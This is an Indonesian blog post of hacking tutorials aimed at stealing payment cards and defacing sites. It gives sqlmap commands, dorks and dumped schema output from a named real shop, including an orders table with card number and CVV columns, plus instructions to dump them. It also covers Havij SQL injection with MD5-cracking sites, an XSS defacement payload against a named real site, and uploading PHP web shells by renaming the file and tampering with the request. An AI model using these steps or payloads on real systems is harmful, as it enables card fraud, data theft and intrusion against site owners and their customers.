Senin, 17 Maret 2014

TUTORIAL CARDING ( WITH CARDING DORK & SQLMAP KALI LINUX)

Ok Langsung Aja Ke Tkp

1. sqlmap
2. dork carding ( bisa cari di google ) / download
3. sqli scanner :

Pertama ,ambil dork lalu scan menggunakan sqli scanner :




Setelah itu kita test URL target dengan memberi kan tanda petik di depan "="


Nah, web tersebut error saat kita inject ,




Kedua, kita eksekusi menggunakan sqlmap :
berikut perintahnya : ./sqlmap.py -u link --dbs

Disini kita mendapatkan 3 database :



[*] balboast_gkgbu
[*] balboast_gkgcart
[*] information_schema


Setelah itu kita dump database nya untuk mencari table ,
gunakan perintah : ./sqlmap.py -u link -D namadatabase --tables ( disini saya coba database "balboast_gkgcart" )


nah, saya dapat tables nya :




Database: balboast_gkgcart                                                                                                                                                                     
[88 tables]
+-----------------------+
| amanu                 |
| categories            |
| clients               |
| components            |
| config                |
| config_groups         |
| customers             |
| form_data             |
| form_fields           |
| forms                 |
| geo                   |
| groups                |
| item_amanu            |
| item_cat              |
| item_files            |
| item_files_customer   |
| item_options          |
| item_options_linked   |
| item_options_values   |
| item_related          |
| item_thread           |
| item_thread_old       |
| items                 |
| items_addphoto        |
| items_item_files      |
| items_packages        |
| languages             |
| logs                  |
| mailinglist           |
| mailinglist_cat       |
| mailinglist_members   |
| manu                  |
| news                  |
| news_cat              |
| news_news_cat         |
| orders                |
| photos                |
| photos_cat            |
| pic_gallery           |
| ship_prices           |
| ship_zones            |
| sites                 |
| sites_components      |
| thread                |
| thread_gel            |
| thread_items          |
| ups                   |
| ups_packaging         |
| ups_pickup            |
| ups_service           |
| ups_units             |
| users                 |
| users_access          |
| users_groups          |
| users_spu             |
| users_spu_values      |
| zones                 |
+-----------------------+

[09:47:41] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/balboastitch.com'

Kita pilih di bagian "orders" . Kita ambil columns nya .
Gunakan perintah : sqlmap.py -u link -D namadatabase -T namatable --columns

Maka akan muncul seperti ini : 




Table: orders
[18 columns]
+-----------------+-------------+
| Column          | Type        |
+-----------------+-------------+
| cart_id         | varchar(15) |
| cc_ex_month     | tinyint(4)  |
| cc_ex_year      | int(11)     |
| cc_number       | varchar(30) |
| cc_type         | varchar(20) |
| customer_id     | int(11)     |
| cvv2            | varchar(20) |
| date            | datetime    |
| id              | int(11)     |
| ipaddress       | varchar(25) |
| payment_method  | varchar(15) |
| shipping        | float(8,2)  |
| shipping_method | varchar(5)  |
| status          | tinyint(4)  |
| subtotal        | float(8,2)  |
| tax             | float(8,2)  |
| text            | text        |
| total           | float(8,2)  |
+-----------------+-------------+


Nah :D sudah muncul, selesai sudah..tinggal kita dump 1 per 1 columnsnya bro :)
Caranya : ./sqlmap.py -u link -D namadatabase -T namatable --dump

contoh : ./sqlmap.py -u link -D namadatabase -T namatable -C cc_number --dump
maka nanti cc number akan muncul walau proses agak lama .

Jika kurang jelas bisa download video nya disini


Semoga bermanfaat :)

TUTORIAL CARDING DENGAN HAVIJ

sekarang dunia telah maju pesat dalam teknologi , bahkan dala hacking pun sekarang dipermudah berkat adanya software atau tools yang memudahkan kita mengerjakan sesuatu yang kita mau Langsung saja kita sharing bagaimana cara menggunakan Havij   DOWNLOAD

ertama cari dulu dork nya karena kita menggunakan teknik SQL Injection Vulnerability
dork nya bisa anda cari di google dengan keyword DORK SQL , Contoh : " inurl:view_product.php?id= " (tanpa kutip)

Kedua taruh dork tersebut di google search engine lalu cari , maka akan muncul banyak sekali site yang bisa kita inject




Lalu buka satu persatu dan sisipkan tanda ' di akhir URL sampai menemukan syntax eror


Setelah mendapatkan site yang akan menjadi target langsung hajar saja menggunakan havij
Paste url site tersebut ke kolom target di HAVIJ dan tekan Analyze








setelah dapat klik get table dan setelah itu get columns and then get data finish
SELAMAT anda telah berhasil mendapatkan database website tersebut seperti email dan password member bahkan admin dari website tersebut

Setelah itu lihat data found fassword =505be7e39328a96ocfe6 bla..bla..bla.
itu merupakan hash md5 yang belum di crack
untuk menjadi sebuah fassword anda terlebih dahulu mengcrak fassowrd di web ini
md5pass.info
hashcrack.com
generuj.pl
authsecu.com
md5decryption.com
md5.rednoize.com
md5decrypter.com
md5crack.com
gdataonline.com
passcracking.com
cmd5.com
schwett.com/md5
milw0rm.com/md5
md5this.com
tmto.org
hashchecker.com
kerinci.net
hash.db.hk
crackfor.me
md5-db.de
md5hood.com
neofusion.de
xmd5.cn
md5.shalla.de
md5.my-addr.com
hashcracking.info <– API: https://hashcracking.info/check.php?hash {hash}
md5.opencracking.info
md5online.net
macrosoftware.ro/md5
netmd5crack.com
bokehman.com
md5-decrypter.com
hash-database.net
thoran.eu
md5-database.net
web-security-services.com

bitdelivery.net

Deface Website Menggunakan Teknik XSS Vulnerability

Sebelumnya udah pada tau belum apa itu XSS Vulnerability? XSS Vulnerability adalah suatu cara memasukan code/script HTML kedalam suatu website dan dijalankan melalui browser di client. Ok deh, Langsung aja kita bahas bersama Cara Deface Website Menggunakan Teknik XSS Vulnerability ini !

1). Pertama, Masukan Dorknya :

inurl:"/showcatrows.php?CategoryID="

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

2). Kalo sudah, Pilih salah satu web yang akan kita deface.

Contoh : saya pakai web ini http://www.examsolutions.co.uk/...?CategoryID=13

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

3). Jika sudah masuk ke halaman web target, kita modifikasi sedikit URL web target dengan menambahkan tanda " dan > setelah angka, tepatnya pada akhir URL. Lalu tambahkan kode HTML deface kita.

Contoh : http://www.examsolutions.co.uk/...?CategoryID=13"><marquee><h1>Hacked by Cirebon-Cyber4rt</h1></marquee>

4). Kemudian tekan Enter.

http://cirebon-cyber4rt.blogspot.com/2012/06/cara-deface-website-menggunakan-teknik.html

5). Selesai, Website sudah berhasil kita deface :D

Triknya memang cukup simpel, dimana kita memanfaatkan celah keamanan pada XSS sebuah website dengan memasukan sebuah code/script HTML.

Sekian tutorial deface website kali ini dari saya, semoga artikel tentang Cara Deface Website Menggunakan Teknik XSS Vulnerability ini dapat bermanfaat bagi sobat.

Source: Hacker Newbie

Tamper Data (Upload PHP file)

Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang jadi pertanyaan kalau web target hanya mendukung file.jpg untuk di upload gimana ? Nah itu yang akan saya sharing tekhniknya. Tahap-tahapnya seperti berikut ini. Tapi dengan catatan anda telah menguasai website target dengan tekhnik : sql injection , LFI / RFI , atau exploit.

1. Siapkan dulu file shell.php seperti : C99Shellr57, atau lainya cari aja di google banyak :D
2. Rename dengan nama : shell.php.jpg
3. Install add ons Tamper Data dulu di browser mozilla kita, Download disini :D 
4. Restart dan kita mulai upload
5. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan



6. Trus Uploads shell.php.jpg kita dan tamper :D


7. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan rename path shell.php.jpg menjadi shell.php ! ingat yah :D


Sekarang anda tinggal cari dimana file shell anda berada .
Dan buka path shell.php anda di url browser dan siap meluncur ke TKP. Tapi inget, gak semua web target bisa kita lakukan dengan tekhnik ini .Kalau gak berhasil , silahkan hubungi adminnya aja langsung :D :D

Deface Dengan Shell upload vulnerability


Dork    :
inurl:"/?ptype=post_listing"
inurl:"/?ptype=post_event"
inurl:"/?page=property_submit"
intext:"Geo Places Theme by"
intext:"(You can upload more than one images to create image gallery on detail page)" 

Site:: 

- http://site.com/?ptype=post_listing
- http://site.com/?ptype=post_event
- http://site.com/path/?ptype=post_listing
- http://site.com/path/?ptype=post_event 
 
Sebelumnya Rename dulu Shellmu jadi ext. jpg
cth: shell.php.jpg / shell.php;.jpg
Upload shellmu,, gunakan tamper data.  Silahkan Lihat Cara Tamper Data (Upload PHP File) 
 
 
Hasilnya bisa dilihat
- http://site.com/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
- http://site.com/path/wp-content/themes/GeoPlaces/images/tmp/[shellmu]
 
Video Tutorial 
  
 

Postingan Lebih Baru Postingan Lama Beranda